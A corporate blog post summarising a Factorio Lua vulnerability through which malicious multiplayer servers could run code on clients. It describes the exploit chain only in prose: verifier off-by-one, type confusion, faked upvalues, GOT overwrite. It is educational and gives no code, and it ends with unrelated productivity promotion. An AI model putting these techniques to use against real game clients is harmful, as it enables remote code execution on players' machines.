Pricing

Factorio Lua Vulnerability: Insights and Exploits Explained

BY Mark Howell 29 June 20244 MINS READ
article cover

On 29/06/2024, we delve into an in-depth examination of a critical vulnerability in Factorio’s Lua implementation, which exposed clients to arbitrary code execution by malicious servers. Factorio had over 3.5 million copies sold, highlighting the potential vast impact on its user base. This article aims to educate on dynamic language vulnerabilities using Lua as a model and offers an interactive challenge to practice these concepts.

Factorio and Lua Integration

Factorio Game Interface

What is Factorio?

Factorio is a popular game focused on automating a factory to produce a rocket and leave a planet. With millions of copies sold and an active modding community, the game became a prime target for security research.

How is Lua Used?

Lua scripts in Factorio handle game logic, mod creation, and custom maps, facilitating extensive community engagement. While initially seeming limited to local exploits through mods, deeper inspection reveals a broader attack surface via the game’s multiplayer mode. Using deterministic lockstep synchronization, Lua code execution on one client propagates to others, escalating the impact of potential exploits.

General Exploitation Path

The general exploitation path to attack the Lua interpreter from the network involves:

  1. Identifying a Point of Entry for Lua code execution.

  2. Exploring Lua Modules: Often, these include modules for interactions with the host, deemed dangerous.

  3. Utilizing Bytecode: Lua compiles scripts into bytecode, executed directly by the interpreter—a powerful capability if leveraged correctly.

Bytecode Verifier and Exploitation

Bytecode Verifier

Originally, Lua developers implemented a bytecode verifier to prevent malicious bytecode execution. However, it was discontinued due to its bypassability. Factorio implemented its verifier, primarily preventing out-of-bounds operations, but it had off-by-one issues.

Exploitation Path

By exploiting type confusion and leveraging bytecode’s raw power, we can:

  • Leak Memory: Using type confusion in loops.

  • Create Fake Objects: Modifying upvalue pointers to access arbitrary data.

  • Write Arbitrary Memory: Creating fake upvalues and controlling the Lua execution flow.

Practical Exploitation in Factorio

Leaking Addresses

Leaking addresses in Lua can be done via type confusion:

  • Utilizing the TValue structure internally, which dynamically transforms data types during runtime.

  • Confusion in Loops: Especially in numeric loops where type checks are bypassed in compiled bytecode.

Fetching Fake Objects

Control over upvalues in closures enables the creation of fake Lua objects:

  • Modifying Prototype Pointers: Gaining access to and modifying upvalues in memory to craft specific objects.

Achieving Remote Code Execution (RCE) on Linux

By leveraging Lua’s weaknesses in Factorio:

  • Manipulating GOT Table: Overwriting entries to execute system commands, bypassing ASLR by leaking function pointers.

Key Exploitation Steps

  • Patch Bytecode: Modify FORPREP and similar opcodes to bypass type checks.

  • Create Arbitrary String Headers: Extend strings to encapsulate exploitable data.

  • Manipulate UpValue Indexes: Redirect arbitrary data access and modification.

Conclusion

Understanding the intricacies of Lua’s bytecode and security flaws enlightens broader vulnerability awareness in dynamic scripting languages. For practical experience, you can participate in the Escape from Alcawasm challenge and test your skills.

Remember these 3 key ideas for your startup:

  1. Security First: Always prioritize the security of your applications. Understanding potential vulnerabilities, like those exposed in Factorio, helps ensure a robust defense against attacks. Read our in-depth guide on why time tracking is important in project management.

  2. Community Engagement: Leverage active user communities for critical insights and feedback. The modding community in Factorio served as both a strength and a vulnerability, teaching a balanced approach to user-generated content. Implement effective community strategies with our article on the ultimate guide to choosing the right remote working platform.

  3. Innovative Practice: Use interactive challenges and educational exercises to keep your team sharp. Participating in practices like the provided coding challenge enhances learning and preparedness. Discover innovative ways to keep your team engaged in our article on how to tell if a remote worker is engaged at work.
    Edworking is the best and smartest decision for SMEs and startups to be more productive. Edworking is a FREE superapp of productivity that includes all you need for work powered by AI in the same superapp, connecting Task Management, Docs, Chat, Videocall, and File Management. Save money today by not paying for Slack, Trello, Dropbox, Zoom, and Notion.
    For more details, see the original source.

article cover
About the Author: Mark Howell Linkedin

Mark Howell is a talented content writer for Edworking's blog, consistently producing high-quality articles on a daily basis. As a Sales Representative, he brings a unique perspective to his writing, providing valuable insights and actionable advice for readers in the education industry. With a keen eye for detail and a passion for sharing knowledge, Mark is an indispensable member of the Edworking team. His expertise in task management ensures that he is always on top of his assignments and meets strict deadlines. Furthermore, Mark's skills in project management enable him to collaborate effectively with colleagues, contributing to the team's overall success and growth. As a reliable and diligent professional, Mark Howell continues to elevate Edworking's blog and brand with his well-researched and engaging content.

Trendy NewsSee All Articles
CoverEdit PDFs Securely & Freely: Breeze PDF In-Browser SolutionBreeze PDF is a free, offline browser-based PDF editor ensuring privacy. It offers text, image, and signature additions, form fields, merging, page deletion, and password protection without uploads.
BY Mark Howell 1 mo ago
CoverDecoding R1: The Future of AI Reasoning ModelsR1 is an affordable, open-source AI model emphasizing reasoning, enabling innovation and efficiency, while influencing AI advancements and geopolitical dynamics.
BY Mark Howell 26 January 2025
CoverSteam Brick: A Minimalist Gaming Console Redefines PortabilitySteam Brick: A modified, screenless Steam Deck for travel, focusing on portability by using external displays and inputs. A creative yet impractical DIY project with potential risks.
BY Mark Howell 26 January 2025
CoverVisual Prompt Injections: Essential Guide for StartupsThe Beginner's Guide to Visual Prompt Injections explores vulnerabilities in AI models like GPT-4V, highlighting security risks for startups and offering strategies to mitigate potential data compromises.
BY Mark Howell 13 November 2024
CoverGraph-Based AI: Pioneering Future Innovation PathwaysGraph-based AI, developed by MIT's Markus J. Buehler, bridges unrelated fields, revealing shared complexity patterns, accelerating innovation by uncovering novel ideas and designs, fostering unprecedented growth opportunities.
BY Mark Howell 13 November 2024
CoverRevolutionary Image Protection: Watermark Anything with Localized MessagesWatermark Anything enables embedding multiple localized watermarks in images, balancing imperceptibility and robustness. It uses Python, PyTorch, and CUDA, with COCO dataset, under CC-BY-NC license.
BY Mark Howell 13 November 2024
CoverJungle Music's Role in Shaping 90s Video Game SoundtracksJungle music in the 90s revolutionized video game soundtracks, enhancing fast-paced gameplay on PlayStation and Nintendo 64, and fostering a cultural revolution through its energetic beats and immersive experiences.
BY Mark Howell 13 November 2024
CoverMastering Probability-Generating Functions: A Guide for EntrepreneursProbability-generating functions (pgfs) are mathematical tools used in probability theory for data analysis, risk management, and predictive modeling, crucial for startups and SMEs in strategic decision-making.
BY Mark Howell 31 October 2024
Try EdworkingA new way to work from  anywhere, for everyone for Free!
Sign up Now